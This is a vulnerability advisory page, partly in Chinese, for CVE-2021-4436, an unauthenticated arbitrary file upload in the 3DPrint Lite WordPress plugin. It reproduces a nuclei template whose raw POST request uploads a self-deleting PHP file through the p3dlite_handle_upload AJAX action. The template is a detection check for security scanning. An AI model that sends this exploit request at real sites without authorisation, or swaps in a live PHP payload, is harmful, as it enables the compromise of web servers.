CVE-2021-4436: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: 3DPrint Lite | POC: 已公开

漏洞描述

The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.

PoC代码[已公开]

id: CVE-2021-4436

info:
  name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
  author: s4e-io
  severity: critical
  description: |
    The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
  remediation: Fixed in 1.9.1.5
  reference:
    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-4436
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-4436
    cwe-id: CWE-434
    epss-score: 0.77433
    epss-percentile: 0.98928
    cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp3dprinting
    product: 3dprint_lite
    framework: wordpress
    publicwww-query: "/wp-content/plugins/3dprint-lite/"
  tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive,vkev,vuln

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353

        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="action"

        p3dlite_handle_upload
        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: text/php

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------54331109111293931601238262353--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"jsonrpc":"2.0"'
          - '"filename":'
          - "{{filename}}.php"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008687d226613fde0c9fbd6527a81a335e972774c6a0d5d8bd377209321adb9f7e022006e285d15b6a58bc50d81a921c18d283553231fb442cd673160b026c3dd2f476:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-4436.yaml

相关漏洞推荐